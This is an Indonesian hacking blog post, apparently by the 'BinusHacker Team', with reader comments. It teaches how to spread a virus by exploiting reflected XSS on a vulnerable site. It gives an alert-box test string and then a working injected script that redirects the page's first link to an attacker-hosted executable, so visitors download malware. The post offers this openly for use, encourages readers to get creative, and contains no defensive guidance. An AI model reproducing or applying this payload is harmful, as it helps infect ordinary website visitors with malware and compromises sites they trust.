Home / Virus / XSS Untuk Penyebaran Virus
xss-for-sperad-virus

XSS Untuk Penyebaran Virus

Sahabat semuanya, apa kabar?

Saatnya beraksi agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?
Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking

Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah:
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal: http://www.situssaya.com/virussaya.exe
2. Kita memiliki target yang memiliki vulnerability untuk CSS, misalkan: http://www.target.com/index.php?download=<script>alert(“BinusHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.

Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:
Download XSS Tools

Nah, langsung saja pada praktek!

Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:

http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>

Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.

Gunakan imajinasi anda, agar bisa lebih berkreasi kembali.

Berikut adalah contoh, penjelesan dan video mengenai XSS Persistence Demo

Semoga artikel di atas bermanfaat & selamat berkreasi di tahun baru 🙂

BinusHacker Team – We Never Sleep – Just Temporary Busy

About Artikel

Check Also

malware-api-winapi-binushacker

Kumpulan Fungsi WinAPI Pada Malware

Virus, Worm, Trojan, Spyware dan sebagainya yang termasuk kategori Malware atau malicious software mungkin sering …

9 comments

  1. Nah itu kan cara nyebarinnya? boleh tahu ga cara protect server kita dari yang beginian, kasihan kan client/end user nya? mohon bimbingannya! 🙂

  2. mgkn kesimpulan yg lbh tepat untk kasus d atas:
    Setiap user yg mengklik link pertama dlm struktur DOM halaman yg terbentuk pada website target akan melakukan download virus tsb, dngn catatan user melakukan klik tsb pada browser yg sdh dimasuki script xss d atas. Jika user membukanya dngn browser lain, tentu download virus tdk akan terjadi.
    Oh ya, kalau mmg komen saya ini bisa masuk, berarti anda perlu menambah rule validasi email 🙂

  3. aplikasi transfer virus dari handphone gimana dong,…?

  4. Hmtt… Lantas , Bagaimana Dengan Bug XSS Yang Tidak Ada Fungsi Download Nya ?? Gak Ngefek Dong Gan ???

    Hmmt… Kemudian File Yang Di Download Tadi Akan Di Taruh Di Folder Apa Gan ??

    Maaf…. Banyak Tanya Maklum Gak Tau Apa Apa….

    Regardz

    Dark Cyber , Lamerz Crew 😀

  5. Apa teknik XSS masih ada sampe sekarang ?.. wow, terakhir saya tau udah lama, dari buku s’to … teknik itu kayanya teknik lama. tp kalo masih ada sampe sekarang, keterlaluan..

  6. x: “Jika user membukanya dngn browser lain, tentu download virus tdk akan terjadi.”

    Brarti targetnya hanya orang2 dekat bro???

  7. Apa teknik XSS masih ada kah ? PARAH !!!!!!!

Tinggalkan Balasan ke Tanjung Batalkan balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *